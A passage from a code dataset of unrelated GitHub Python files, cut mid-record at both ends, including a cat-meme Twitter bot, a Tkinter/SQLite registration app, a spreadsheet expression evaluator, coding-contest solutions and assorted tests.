os.environ[\"KIITENSUPORT_ACCESS_SECRET\"]\n access_token = os.environ[\"KIITENSUPORT_ACCESS_TOKEN\"]\n access_token_secret = os.environ[\"KIITENSUPORT_ACCESS_TOKEN_SECRET\"]\n return await utils.create_twitter(key, secret, access_token, access_token_secret)\n\n\nasync def get_random_message():\n p = randint(1, 20)\n async with aiohttp.ClientSession() as session:\n async with session.get(f\"https://www.pensador.com/frases/{p}/\") as resp:\n if resp.status != 200:\n return\n content = await resp.text()\n soup = BeautifulSoup(content, \"html.parser\")\n phrase = choice(soup.find_all(\"p\", class_=\"frase\"))\n if not phrase:\n return\n author = phrase.parent.find(\"span\", class_=\"autor\").find(\"a\")\n if not author:\n return\n phrase = f\"“{phrase.get_text()}” — {author.get_text()}\"\n return phrase\n\n\nasync def get_random_kitten_image_url():\n key = os.environ[\"KIITENSUPORT_THECATAPI_KEY\"]\n url = \"https://api.thecatapi.com/v1/images/search?api_key={key}&limit=1\"\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as resp:\n if resp.status != 200:\n return\n data = await resp.json()\n if not isinstance(data, (list,)) or len(data) == 0:\n return\n return data[0].get(\"url\")\n\n\nasync def main() -> None:\n utils.log.info(\"kiitensupport bot started\")\n api = await create_api()\n while True:\n if not \"DRYRUN\" in os.environ:\n await asyncio.sleep(utils.next_hour(19).seconds)\n else:\n await asyncio.sleep(1)\n try:\n phrase = await get_random_message()\n if not phrase:\n continue\n\n kitten_url = await get_random_kitten_image_url()\n if not kitten_url:\n continue\n\n async with utils.download_image(kitten_url) as path:\n new_image_path = await mememaker.create_meme_tempfile(path, phrase)\n if not new_image_path:\n continue\n\n if not \"DRYRUN\" in os.environ:\n status = await api.update_with_media(new_image_path)\n utils.log.info(\"Posted %s\", await utils.get_tweet_url(api, status))\n else:\n utils.log.debug(\"DRYRUN, skipping\")\n except TweepError as e:\n utils.log.error(f\"TweepError %s\", e)\n except Exception as e:\n utils.log.error(\"Uncaught exception %s\", e)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"dhilst/geckones_twitter_bots","sub_path":"kittensupport.py","file_name":"kittensupport.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"37421796709","text":"\"\"\"Tests for G2P training/application.\"\"\"\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\n\nimport pytest\n\nfrom asrlex.g2p import remap_reserved_symbols, restore_reserved_symbols, G2P\nfrom asrlex.prondict import PronDict\n\n\nPARENT_DIR = Path(__file__).parent\nREF_DICT_PATH = Path(PARENT_DIR, 'sample.dict')\nREF_MODEL_PATH = Path(PARENT_DIR, 'g2p.fst')\n\nSYMS_TXT = ('right-brace} R...\\n'\n\t 'i_p_o ay...\\n'\n 'pipe| p...\\n')\nNO_SYMS_TXT = ('right-brace\\u2622 R...\\n'\n 'i\\u2695p\\u2695o ay...\\n'\n 'pipe\\u262f p...\\n')\n\ndef test_remap_reserved_symbols():\n assert NO_SYMS_TXT == remap_reserved_symbols(SYMS_TXT)\n\n\ndef test_restore_reserved_symbols():\n assert SYMS_TXT == restore_reserved_symbols(NO_SYMS_TXT)\n\n\ndef test_g2p_init():\n G2P(REF_MODEL_PATH)\n\n\ndef test_train_g2p(tmpdir):\n # Test argument checking.\n with pytest.raises(TypeError):\n G2P.train_g2p('/dev/null', PronDict(), ngram_order=1.5)\n with pytest.raises(ValueError):\n G2P.train_g2p('/dev/null', PronDict(), ngram_order=0)\n with pytest.raises(ValueError):\n G2P.train_g2p('/dev/null', PronDict(), seq1_max=0)\n with pytest.raises(ValueError):\n G2P.train_g2p('/dev/null', PronDict(), seq2_max=0)\n\n # Train model.\n pdict = PronDict.load_dict(REF_DICT_PATH)\n model_path = Path(tmpdir, 'g2p.fst')\n model = G2P.train_g2p(\n model_path, pdict, ngram_order=3, seq1_del=True, seq1_max=2,\n seq2_del=True, seq2_max=2, grow=False)\n assert model is not None\n assert model_path.exists()\n\n # Check that it generates the expected pronunciations\n expected_prons = {('dh', 'ah'), ('dh', 'iy')}\n actual_prons = model.get_prons('the')\n assert actual_prons == expected_prons\n\n\ndef test_g2p_get_prons():\n model = G2P(REF_MODEL_PATH)\n expected_prons = {('dh', 'ah'), ('dh', 'iy')}\n actual_prons = model.get_prons('the')\n assert actual_prons == expected_prons\n","repo_name":"nryant/asrlex","sub_path":"asrlex/tests/test_g2p.py","file_name":"test_g2p.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32407779217","text":"import sys\ninput = sys.stdin.readline\n\ndef recursive(n, c):\n\tprefix = '____' * (n - c)\n\tintro = [prefix + '\"재귀함수가 뭔가요?\"']\n\touttro = [prefix + '라고 답변하였지.']\n\tif c == 0:\n\t\tbody = [prefix + '\"재귀함수는 자기 자신을 호출하는 함수라네\"']\n\t\treturn intro + body + outtro\n\n\tbody = [prefix + '\"잘 들어보게. 옛날옛날 한 산 꼭대기에 이세상 모든 지식을 통달한 선인이 있었어.',\n\tprefix + '마을 사람들은 모두 그 선인에게 수많은 질문을 했고, 모두 지혜롭게 대답해 주었지.',\n\tprefix + '그의 답은 대부분 옳았다고 하네. 그런데 어느 날, 그 선인에게 한 선비가 찾아와서 물었어.\"']\n\treturn intro + body + recursive(n, c - 1) + outtro\n\ndef solution():\n\tn = int(input())\n\tprint(\"어느 한 컴퓨터공학과 학생이 유명한 교수님을 찾아가 물었다.\")\n\tprint('\\n'.join(recursive(n, n)))\n\nif __name__ == \"__main__\":\n\tsolution()\n","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/2 recursive_function/what_is_recursive_func_17478.py","file_name":"what_is_recursive_func_17478.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23631584401","text":"#!/usr/bin/python\n\nfin = open('A-small-attempt0.in', 'r')\nfout = open('A-small.out', 'w')\n\ncyph = dict()\ncyph['a'] = 'y'\ncyph['b'] = 'h'\ncyph['c'] = 'e'\ncyph['d'] = 's'\ncyph['e'] = 'o'\ncyph['f'] = 'c'\ncyph['g'] = 'v'\ncyph['h'] = 'x'\ncyph['i'] = 'd'\ncyph['j'] = 'u'\ncyph['k'] = 'i'\ncyph['l'] = 'g'\ncyph['m'] = 'l'\ncyph['n'] = 'b'\ncyph['o'] = 'k'\ncyph['p'] = 'r'\ncyph['q'] = 'z'\ncyph['r'] = 't'\ncyph['s'] = 'n'\ncyph['t'] = 'w'\ncyph['u'] = 'j'\ncyph['v'] = 'p'\ncyph['w'] = 'f'\ncyph['x'] = 'm'\ncyph['y'] = 'a'\ncyph['z'] = 'q'\n\nT = int (fin.readline ())\n\nfor i in range ( 1, T + 1 ):\n lin = fin.readline ()\n for j in range(len(lin)):\n if lin[j] != ' ' and lin[j] != '\\n':\n #print lin[j], cyph[lin[j]]\n lin = lin[0:j] + cyph[lin[j]] + lin[j+1:]\n fout.write (\"Case #%d: %s\" % ( i, lin ) )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/1738.py","file_name":"1738.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23429866681","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport sys, os, re\r\n\r\nf = open('./input.txt')\r\no = open('./output.txt', 'w')\r\nT = int(f.readline())\r\n\r\ndef time_farm_or_cookie(C, F, s):\r\n\treturn C * (1 / F + 1 / s)\r\n\r\nfor case in range(1, T+1):\r\n\tn = map(float, f.readline().split(' '))\r\n\tC = n[0] # farm price\r\n\tF = n[1] # farm cookie/sec\r\n\tX = n[2] # goal\r\n\ts = 2.0 # 2 cookies/sec\r\n\tt = 0.0\r\n\tfinish = False\r\n\r\n\twhile not finish:\r\n\t\ttt = time_farm_or_cookie(C, F, s)\r\n\r\n\t\tif X <= tt * s:\r\n\t\t\tt += X / s #round(t + X / s, 7)\r\n\t\t\tfinish = True\r\n\t\telse:\r\n\t\t\tt += C / s #round(t + C / s, 7)\r\n\t\t\ts += F\r\n\r\n\tt = round(t, 7)\r\n\to.write(\"Case #%s: %s\\n\" % (case, t))\r\n\r\nf.close()\r\no.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/885.py","file_name":"885.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35854010843","text":"import multiprocessing\nimport os\n\n\ndef copy_file(queue, file_name, old_folder_name, new_folder_name):\n f_read = open(\"../\" + old_folder_name + \"/\" + file_name, 'rb')\n f_write = open(\"../\" + new_folder_name + \"/\" + file_name, 'wb')\n while True:\n content = f_read.read()\n if content:\n f_write.write(content)\n else:\n break\n f_read.close()\n f_write.close()\n # print(\"文件复制完毕!\")\n queue.put(file_name)\n\n\ndef main():\n # 获取要复制的文件夹名称\n old_folder_name = input('请输入要复制的文件夹名称:')\n # 创建新的文件夹名称\n new_folder_name = old_folder_name + \"_副本\"\n # 创建新的文件夹\n try:\n os.mkdir(\"../\" + new_folder_name)\n except Exception as ret:\n print(\"文件夹已存在!\")\n pass\n # 获取文件夹下所有文件的名称\n file_names = os.listdir(\"../\" + old_folder_name)\n # 创建线程池\n pool = multiprocessing.Pool(3)\n # 创建队列\n queue = multiprocessing.Manager().Queue()\n # 向线程池中添加任务\n for file_name in file_names:\n pool.apply_async(copy_file, args=(queue, file_name, old_folder_name, new_folder_name))\n print(file_name)\n\n print(\"----\")\n pool.close()\n # pool.join()\n all_file_nums = len(file_names)\n while True:\n get_file_name = queue.get()\n if get_file_name in file_names:\n file_names.remove(get_file_name)\n\n copy_rate = 1 - len(file_names) / all_file_nums\n print(\"\\r%.2f...(%s)\" % (copy_rate, file_name) + \" \" * 50, end=\"\")\n if copy_rate >= 1:\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MakaiX/python_learn","sub_path":"04_process/file_copy.py","file_name":"file_copy.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27805065601","text":"from tkinter import *\r\nfrom tkinter.messagebox import *\r\nfrom tkinter import ttk\r\nimport sqlite3\r\nimport re\r\n\r\n# Declaramos el main de la app y seteamos la app\r\nmain = Tk()\r\nmain.title(\"System UTNBA\")\r\nmain.configure(bg='#F0F7DA')\r\ntitulo = Label(main, text=\"System UTNBA\", width=80, foreground='#F0F7DA', bg='#1F192F', font='Arial 15 bold').grid(pady=10, row=0, columnspan=6)\r\nfuentetit = 'Mooli 12'\r\nfuentecue = 'Roboto-Medium 10'\r\npatrondni = \"^[0-9]+(?i:[ _-][0-9]+)*$\"\r\n\r\n# Comenzamos a definir todas las funciones que usara la aplicacion\r\ndef creartabla():\r\n global cursor\r\n global db\r\n db = sqlite3.connect(\"baseTPinicial.db\")\r\n cursor = db.cursor()\r\n sql = \"CREATE TABLE IF NOT EXISTS personas(id INTEGER PRIMARY KEY AUTOINCREMENT, nombre VARCHAR(50) NOT NULL, apellido VARCHAR(50) NOT NULL, documento INT NOT NULL, correo VARCHAR(50) NOT NULL, filiacion VARCHAR(50))\"\r\n cursor.execute(sql)\r\n db.commit()\r\n\r\n\r\ndef regpersona():\r\n patron = \"^[A-Za-z]+(?i:[ _-][A-Za-z]+)*$\"\r\n patroncorreo = \"^[A-Za-z]+@\"\r\n if (re.match(patrondni, var_dni.get())):\r\n if (re.match(patroncorreo, var_correo.get())):\r\n if (re.match(patron, var_nombre.get()) and re.match(patron, var_apellido.get())):\r\n resultadodni = busquedadni(var_dni.get())\r\n if (resultadodni ==[]):\r\n sql = \"INSERT INTO personas (nombre, apellido, documento, correo, filiacion) VALUES (?,?,?,?,?)\"\r\n datos = (var_nombre.get(),var_apellido.get(),var_dni.get(),var_correo.get(),combo.get())\r\n cursor.execute(sql, datos)\r\n db.commit()\r\n mostrardb()\r\n limpiar()\r\n else:\r\n showwarning(\"Error\", \"El dni ingresado ya existe en la base, ingrese otro\")\r\n else:\r\n showerror(\"Error\", \"No es posible guardar\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un correo electronico correcto\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor numerico en DNI\")\r\n\r\n\r\ndef busquedadni(var):\r\n sql = \"SELECT * FROM personas WHERE documento = \" + var\r\n cursor.execute(sql)\r\n resultado = cursor.fetchall()\r\n return resultado\r\n\r\n\r\ndef conspersona():\r\n if (re.match(patrondni, var_dnic.get())):\r\n resultado = busquedadni(var_dnic.get())\r\n if resultado !=[] :\r\n showinfo(\"El resultado es:\", resultado)\r\n var_dnic.set('')\r\n else:\r\n showerror(\"Error\", \"El dni ingesado no existe en la base de datos\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor valido\")\r\n\r\n\r\ndef modpersona():\r\n global botonmod\r\n if (re.match(patrondni, var_dnic.get())):\r\n resultado = busquedadni(var_dnic.get())\r\n if resultado !=[]:\r\n sql = \"SELECT * FROM personas WHERE documento = \" + var_dnic.get()\r\n cursor.execute(sql)\r\n persona = cursor.fetchone()\r\n var_nombre.set(persona[1])\r\n var_apellido.set(persona[2])\r\n var_dni.set(persona[3])\r\n var_correo.set(persona[4])\r\n combo.set(persona[5])\r\n botonmod = Button(main, text=\" Modificar \", bg='#C1FD53',font=fuentecue, command=modificarendb)\r\n botonmod.grid(row=7, column=1, columnspan=2)\r\n else:\r\n showerror(\"Error\", \"El dni ingesado no existe en la base de datos\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor numerico\")\r\n\r\n\r\ndef modificarendb():\r\n if askyesno(\"Modificar persona\", \"¿Esta seguro que desea modificar esta persona?\"):\r\n sql = \"UPDATE personas SET nombre=?, apellido=?, documento=?, correo=?, filiacion=? WHERE documento = \" + var_dnic.get()\r\n datos = (var_nombre.get(),var_apellido.get(),var_dni.get(),var_correo.get(),combo.get())\r\n cursor.execute(sql, datos)\r\n db.commit()\r\n mostrardb()\r\n limpiar()\r\n var_dnic.set('')\r\n else:\r\n showinfo(\"Salir\", \"Esta a punto de salir\")\r\n botonmod.destroy()\r\n limpiar()\r\n\r\n\r\ndef eliminarpersona():\r\n if (re.match(patrondni, var_dnic.get())):\r\n resultado = busquedadni(var_dnic.get())\r\n if resultado !=[]:\r\n if askyesno(\"Eliminar persona\", \"Esta seguro que desea eliminar esta persona\"):\r\n sql = \"DELETE FROM personas WHERE documento = \" + var_dnic.get()\r\n cursor.execute(sql)\r\n db.commit()\r\n mostrardb()\r\n var_dnic.set('')\r\n showinfo(\"Eliminar\", \"Usuario eliminado\")\r\n else:\r\n showinfo(\"Salir\", \"Esta a punto de salir\")\r\n else:\r\n showerror(\"Error\", \"El dni ingesado no existe en la base de datos\")\r\n else:\r\n showwarning(\"Error\", \"Por favor ingrese un valor numerico\")\r\n\r\n\r\ndef limpiar():\r\n var_nombre.set('')\r\n var_apellido.set('')\r\n var_dni.set('')\r\n var_correo.set('')\r\n combo.set('')\r\n\r\n\r\ndef mostrardb():\r\n sql = \"SELECT * FROM personas\"\r\n cursor.execute(sql)\r\n resultado = cursor.fetchall()\r\n registros = tree.get_children()\r\n for x in registros:\r\n tree.delete(x)\r\n for i in resultado:\r\n tree.insert(\"\", 'end', values=i)\r\n\r\n\r\n# VARIABLES\r\nvar_nombre = StringVar()\r\nvar_apellido = StringVar()\r\nvar_dni = StringVar()\r\nvar_correo = StringVar()\r\nvar_dnic = StringVar()\r\n# ---------- ALTA DE REGISTRO ---------------------------\r\nregistrasetitulo = Label(main, text=\"Registrarse\", bg='#F0F7DA', font=fuentetit).grid(pady=10,row=1, column=1, columnspan=2)\r\nnombre = Label(main, text=\"Nombre\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=2)\r\nnombreentry = Entry(main, textvariable=var_nombre).grid(column=2, row=2)\r\n\r\napellido = Label(main, text=\"Apellido\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=3)\r\napellidoentry = Entry(main,textvariable=var_apellido).grid(column=2, row=3)\r\n\r\ndni = Label(main, text=\"Dni\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=4)\r\ndnientry = Entry(main,textvariable=var_dni).grid(column=2, row=4)\r\n\r\ncorreo = Label(main, text=\"Correo\", bg='#F0F7DA', font=fuentecue).grid(column=1, row=5)\r\ncorreoentry = Entry(main,textvariable=var_correo).grid(column=2, row=5)\r\n\r\nfiliacion = Label(main, text=\"Filiacion\",bg='#F0F7DA', font=fuentecue).grid(column=1, row=6, pady=3)\r\n\r\nboton_reg = Button(main, text=\"Registrar\", bg='#65B8A6', command=regpersona, font=fuentecue).grid(pady=10, row=7, column=1, columnspan=2)\r\n\r\ncombo = ttk.Combobox(\r\n state=\"readonly\",\r\n values=[\"Docente\", \"No Docente\", \"Alumno\", \"Monotributista\"]\r\n)\r\ncombo.grid(column=2,row=6)\r\n\r\n# INPUT MODIFICACION/CONSULTA\r\nconsultatitulo = Label(main, text=\"Consulta\", bg='#F0F7DA', font=fuentetit).grid(pady=10, row=1, column=3, columnspan=2)\r\ndniconsulta = Label(main, text=\"Ingrese Documento\", bg='#F0F7DA', font=fuentecue).grid(column=3, row=2)\r\ndniconsultaentry = Entry(main, textvariable=var_dnic).grid(column=4, row=2 )\r\n\r\nboton_con = Button(main, text=\"Consultar\", bg='#8BE83F', command=conspersona, font=fuentecue).grid(column=3, row=4, columnspan=2)\r\nboton_mod = Button(main, text=\"Modificar\", bg='#66E8CA', command=modpersona, font=fuentecue).grid(row=3, column=3)\r\nboton_eli = Button(main, text=\"Eliminar\", bg='#FF542B', command=eliminarpersona, font=fuentecue).grid(row=3, column=4)\r\n\r\n\r\n\r\n# MUESTRA DE BASE\r\ntree = ttk.Treeview(main, show=\"headings\")\r\ntree[\"columns\"] = (\"1\", \"2\", \"3\", \"4\", \"5\", \"6\")\r\ntree.column(\"1\", minwidth=40, anchor=\"n\")\r\ntree.column(\"2\", minwidth=80, anchor=\"n\")\r\ntree.column(\"3\", minwidth=80, anchor=\"n\")\r\ntree.column(\"4\", minwidth=60, anchor=\"n\")\r\ntree.column(\"5\", minwidth=60, anchor=\"n\")\r\ntree.column(\"6\", minwidth=60, anchor=\"n\")\r\n\r\n\r\n# Encabezado de las columnas del Treeview\r\ntree.heading(\"1\", text=\"ID\", anchor=\"n\")\r\ntree.heading(\"2\", text=\"Nombre\", anchor=\"n\")\r\ntree.heading(\"3\", text=\"Apellido\", anchor=\"n\")\r\ntree.heading(\"4\", text=\"Dni\", anchor=\"n\")\r\ntree.heading(\"5\", text=\"Correo\", anchor=\"n\")\r\ntree.heading(\"6\", text=\"Filiacion\", anchor=\"n\")\r\ntree.grid(row=9, columnspan=6, pady=5)\r\n\r\n\r\n\r\n\r\ncreartabla()\r\nmostrardb()\r\nmain.mainloop()\r\n","repo_name":"Maurodifi/Pythontpinicial","sub_path":"tp_inicial.py","file_name":"tp_inicial.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70835798595","text":"from weapon import Weapon\n\n\nclass Robot:\n\n def __init__(self, name, health, robot_weapon):\n self.robot_name = name\n self.robot_health = health\n self.robot_weapon = robot_weapon\n\n def robot_attack(self,dino):\n self.dino_health -= self.robot_weapon.attack_power\n\n\n\n#These were created to ensure that my init was functional but wont the Init will be the only thing used when importing. Can also use this as quick reference. \nrobot_weapon = Weapon(\"Stun Gun\", 30)\nrobot_1 = Robot(\"Brave litle Toaster\", 130, robot_weapon)\n\nrobot_weapon = Weapon(\"Beam Rifle\", 45)\nrobot_2 = Robot(\"The Iron Giant\", 100, robot_weapon)\n\nrobot_weapon = Weapon(\"Rocket\", 55)\nrobot_3 = Robot(\"Bender\", 75, robot_weapon)\n\n\n\n# copy and bring over to the fleet for the list that you want created. Going to need to append to add to the list. \n# if not sure about . notation throw a breakpoint and watch where it runs too","repo_name":"ZacharyGoolman/robotd_vs_dinos","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14609929524","text":"# coding: utf-8\n\"\"\"\nCreated on Jan 3, 2020\n\n@author: sanin\n\"\"\"\nimport sys\nimport time\n\nfrom PyQt5.QtWidgets import QComboBox\n\nfrom TangoWidgets.TangoWriteWidget import TangoWriteWidget\nfrom TangoWidgets.TangoWidget import TangoWidget\n\n\nclass TangoComboBox(TangoWriteWidget):\n def __init__(self, name, widget: QComboBox, readonly=False):\n super().__init__(name, widget)\n self.widget.currentIndexChanged.connect(self.callback)\n\n def decorate_error(self):\n self.widget.setStyleSheet('color: red')\n\n def update(self, decorate_only=False):\n super().update(decorate_only)\n\n def set_widget_value(self):\n #bs = self.widget.blockSignals(True)\n try:\n self.widget.setCurrentIndex(int(self.attribute.value()))\n except:\n pass\n #self.widget.blockSignals(bs)\n return self.attribute.value()\n\n def compare(self):\n try:\n return int(self.attribute.value()) == self.widget.currentIndex()\n except:\n self.logger.debug('Exception in ComboBox compare', exc_info=True)\n return False\n\n def callback(self, value):\n if self.attribute.connected:\n try:\n self.write(int(value))\n self.decorate_valid()\n except:\n self.logger.debug('Exception %s in callback', sys.exc_info()[1])\n self.decorate_error()\n else:\n self.attribute.reconnect()\n self.decorate_error()\n","repo_name":"smertouh/1_MeV_UI_additional","sub_path":"TangoWidgets/TangoComboBox.py","file_name":"TangoComboBox.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40856684671","text":"import os\n\nprint(os.getcwd())\ntxt_data = 'Chapter08/txt_data/'\n\nsub_dir = os.listdir(txt_data)\nprint(sub_dir)\n\ndef textPro(sub_dir):\n first_txt = []\n second_txt = []\n\n for sdir in sub_dir :\n dirname = txt_data + sdir\n file_list = os.listdir(dirname)\n\n for fname in file_list:\n file_path = dirname + '/' + fname\n\n if os.path.isfile(file_path) :\n try :\n\n file = open(file_path, 'r')\n if sdir == 'first' :\n first_txt.append(file.read())\n else :\n second_txt.append(file.read())\n except Exception as e:\n print('예외발생 :', e)\n finally:\n file.close()\n return first_txt, second_txt\n\nimport pickle\n\npfile_w = open('Chapter08/data/tot_texts.pck', mode='wb')\npickle.dump(tot_texts, pfile_w)\n\npfile_r = open('Chapter08/data/tot_texts.pck', mode='rb')\ntot_texts_read = pickle.load(pfile_r)\nprint('tot_texts 길이 =', len(tot_texts_read))\n\nprint(type(tot_texts_read))\nprint(tot_texts_read)","repo_name":"hiyeji/git_head","sub_path":"workspace/Chapter08/lecture/step04_text_process.py","file_name":"step04_text_process.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34945632879","text":"from typing import Dict\nimport re\n\n\nclass Spreadsheet:\n def __init__(self):\n self.cells: Dict[str, object] = {}\n self.supported_operations = ['+', '-']\n\n def set_cell_value(self, cell_id: str, value: object) -> None:\n \"\"\"\n Sets the value of a cell in the spreadsheet.\n\n Parameters:\n cell_id (str): The ID of the cell to set the value for.\n value (object): The value to set for the cell.\n\n Returns:\n None\n\n Raises:\n ValueError: If the value contains unsupported operators or references undefined cells.\n \"\"\"\n if isinstance(value, str) and value.startswith('='):\n operators = re.findall(r'[+\\-*/]', value)\n unsupported_operators = [operator for operator in operators if operator not in self.supported_operations]\n if unsupported_operators:\n raise ValueError(f\"Unsupported operators {unsupported_operators} found\")\n\n referenced_cells = re.findall(r'[A-Z]+\\d+', value)\n undefined_cells = [cell_reference for cell_reference in referenced_cells if cell_reference not in self.cells]\n if undefined_cells:\n raise ValueError(f\"Referenced cells {undefined_cells} are not defined\")\n\n self.cells[cell_id] = value\n\n def get_cell_value(self, cell_id: str) -> object:\n \"\"\"\n Get the value of a cell from the dictionary.\n\n Args:\n cell_id (str): The ID of the cell.\n\n Returns:\n object: The value of the cell.\n\n Raises:\n ValueError: If the cell is not found.\n \"\"\"\n \n if cell_id not in self.cells:\n raise ValueError(\"Cell not found\")\n \n value = self.cells[cell_id]\n if isinstance(value, str) and value.startswith('='):\n value = self.evaluate_expression(value[1:])\n return value\n\n def evaluate_expression(self, expression: str) -> object:\n \"\"\"\n Evaluate a mathematical expression and return the result.\n\n Args:\n expression (str): The mathematical expression to evaluate.\n\n Returns:\n object: The result of the evaluation.\n\n Raises:\n ValueError: If the expression contains an unsupported or invalid token,\n or if the expression is invalid.\n \"\"\"\n operators = self.supported_operations\n tokens = re.findall(r'[A-Z]+\\d+|[+\\-()]|\\d+\\.\\d+|\\d+', expression)\n stack = []\n\n def perform_operation(op, op1, op2):\n \"\"\"\n Perform a mathematical operation on two operands.\n\n Args:\n op (str): The operator to perform.\n op1 (float): The first operand.\n op2 (float): The second operand.\n\n Returns:\n float: The result of the operation.\n \"\"\"\n if op == '+':\n return op1 + op2\n elif op == '-':\n return op1 - op2\n else:\n raise ValueError(\"Unsupported operation\")\n\n for token in tokens:\n if token in operators:\n while stack and stack[-1] in operators:\n if len(stack) < 3:\n raise ValueError(\"Unsupported or invalid token\")\n op2, op, op1 = stack.pop(), stack.pop(), stack.pop()\n stack.append(perform_operation(op, op1, op2))\n stack.append(token)\n elif token.isdigit() or (token[0] == '-' and token[1:].isdigit()):\n stack.append(float(token))\n elif token in self.cells:\n stack.append(self.get_cell_value(token))\n else:\n raise ValueError(\"Unsupported or invalid token\")\n\n while len(stack) > 1:\n if len(stack) < 3:\n raise ValueError(\"Unsupported or invalid token\")\n op2, op, op1 = stack.pop(), stack.pop(), stack.pop()\n stack.append(perform_operation(op, op1, op2))\n\n if len(stack) != 1:\n raise ValueError(\"Invalid expression\")\n\n return stack[0]\n","repo_name":"jojoe-ainoo/spreadsheet-sdk","sub_path":"spreadsheet-package/spreadsheet/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8632924505","text":"# Tests for HW3\r\n# Prime Number Checker\r\n\r\nimport os.path\r\nimport sys\r\nfrom HW3 import main\r\nfrom tud_tests import *\r\n\r\ndef test_HW3():\r\n\r\n try:\r\n exists = os.path.exists(\"HW3.py\")\r\n assert exists == True\r\n except:\r\n sys.exit()\r\n\r\n # Test 1\r\n set_keyboard_input([25,\"y\",101,\"Y\",10013,\"y\",1013,\"y\",\"red\",53,\"n\"])\r\n main()\r\n output = get_display_output()\r\n\r\n assert output == [\r\n \"Prime Number Checker\",\r\n \"\\nEnter an integer to test: \",\r\n \"25 is a composite number because it is divisible by 5\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"101 is a prime number\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"10013 is a composite number because it is divisible by 17\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"1013 is a prime number\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nEnter an integer to test: \",\r\n \"Invalid integer value! Try again\",\r\n \"\\nEnter an integer to test: \",\r\n \"53 is a prime number\",\r\n \"Do you want to test another integer (y/n): \",\r\n \"\\nBye!\"\r\n ]","repo_name":"brmcbrid/CSC_122_HW3","sub_path":"test_HW3.py","file_name":"test_HW3.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26325167359","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 19 10:37 2020\n\n@author: fdbfvuie\n\"\"\"\n\ninput()\na = input().split()\nfor i in range(len(a)):\n a[i] = int(a[i][::-1])\na.sort()\nprint(a[-1])","repo_name":"fjfhfjfjgishbrk/AE401-Python","sub_path":"zerojudge/c561.py","file_name":"c561.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40222896401","text":"from __future__ import print_function\nfrom orphics import maps,io,cosmology,stats,catalogs,lensing\nfrom orphics.mpi import MPI\nfrom pixell import enmap,wcsutils,utils as putils,bunch\nimport numpy as np\nimport os,sys,re\nimport warnings\nfrom astropy.io import fits\nfrom enlib import bench\nimport argparse\nimport time\n\nfrom HMFunc.cosmology import Cosmology\n\ntry:\n paths = bunch.Bunch(io.config_from_yaml(\"input/paths_local.yml\"))\nexcept:\n print(\"No paths_local.yml file found. Please copy paths.yml to paths_local.yml and edit with your local paths. Do not add the latter file to the git tree.\")\n raise\n\ndefaults = bunch.Bunch(io.config_from_yaml(\"input/defaults.yml\"))\ndata_choice = bunch.Bunch(io.config_from_yaml(\"input/data.yml\"))\n\ndef initialize_pipeline_config():\n start_time = time.time()\n d = defaults\n tags = bunch.Bunch({})\n\n # Parse command line\n parser = argparse.ArgumentParser(description=\"Stacked CMB lensing.\")\n parser.add_argument(\"version\", type=str, help=\"Version label.\")\n parser.add_argument(\n \"cat_type\", type=str, help=\"Catalog path relative to data directory.\"\n )\n parser.add_argument(\n \"-N\",\n \"--nmax\",\n type=int,\n default=None,\n help=\"Limit number of objects used e.g. for debugging or quick tests, or for sim injections.\",\n )\n parser.add_argument(\n \"--grad-lmin\", type=int, default=d.gradient_lmin, help=\"Minimum multipole for Planck.\"\n )\n 